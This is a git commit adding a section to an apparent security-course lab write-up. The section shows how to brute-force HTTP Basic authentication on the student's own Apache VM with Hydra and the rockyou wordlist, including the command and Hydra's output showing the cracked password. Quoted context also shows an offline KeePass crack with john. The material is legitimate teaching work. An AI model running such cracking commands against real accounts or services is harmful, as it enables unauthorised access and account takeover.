Solve Authentication task
This commit is contained in:
parent
8177c14f3f
commit
d27cb057b9
1 changed files with 73 additions and 0 deletions
|
|
@ -27,3 +27,76 @@ john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx)
|
||||||
```
|
```
|
||||||
|
|
||||||
As a result, we get the password: `dancingdiva11195`
|
As a result, we get the password: `dancingdiva11195`
|
||||||
|
|
||||||
|
## Online Password Cracking
|
||||||
|
This task is solved using the `heartbleed` VM from Lab 5.
|
||||||
|
|
||||||
|
### Preparation
|
||||||
|
Look up IP address of `heartbleed` VM:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ip address show
|
||||||
|
```
|
||||||
|
|
||||||
|
Add local DNS entry for `heartbleed` VM:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts
|
||||||
|
```
|
||||||
|
|
||||||
|
Change Apache configuration to require login:
|
||||||
|
|
||||||
|
```diff
|
||||||
|
<VirtualHost *:443>
|
||||||
|
ServerAdmin webmaster@localhost
|
||||||
|
|
||||||
|
DocumentRoot /var/www/heartbleed.ssb
|
||||||
|
ServerName heartbleed.ssb
|
||||||
|
ServerAlias www.heartbleed.ssb
|
||||||
|
SSLEngine on
|
||||||
|
SSLCertificateFile /etc/apache2/ssl/apache.crt
|
||||||
|
SSLCertificateKeyFile /etc/apache2/ssl/apache.key
|
||||||
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||||
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||||
|
+
|
||||||
|
+ <Directory "/var/www/heartbleed.ssb">
|
||||||
|
+ AuthType Basic
|
||||||
|
+ AuthName "Restricted Content"
|
||||||
|
+ AuthUserFile /etc/apache2/.htpasswd
|
||||||
|
+ Require valid-user
|
||||||
|
+ </Directory>
|
||||||
|
</VirtualHost>
|
||||||
|
```
|
||||||
|
|
||||||
|
Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack):
|
||||||
|
|
||||||
|
```sh
|
||||||
|
sudo htpasswd -c /etc/apache2/.htpasswd test
|
||||||
|
```
|
||||||
|
|
||||||
|
Reload settings:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
service apache2 reload
|
||||||
|
```
|
||||||
|
|
||||||
|
### Start Cracking
|
||||||
|
Crack password using `Hydra`:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
hydra -l test -P ./rockyou.txt heartbleed.ssb https-get
|
||||||
|
```
|
||||||
|
|
||||||
|
Output:
|
||||||
|
```
|
||||||
|
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||||
|
|
||||||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46
|
||||||
|
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
|
||||||
|
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
|
||||||
|
[DATA] attacking http-gets://heartbleed.ssb:443/
|
||||||
|
[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active
|
||||||
|
[443][http-get] host: heartbleed.ssb login: test password: vendetta
|
||||||
|
1 of 1 target successfully completed, 1 valid password found
|
||||||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41
|
||||||
|
```
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue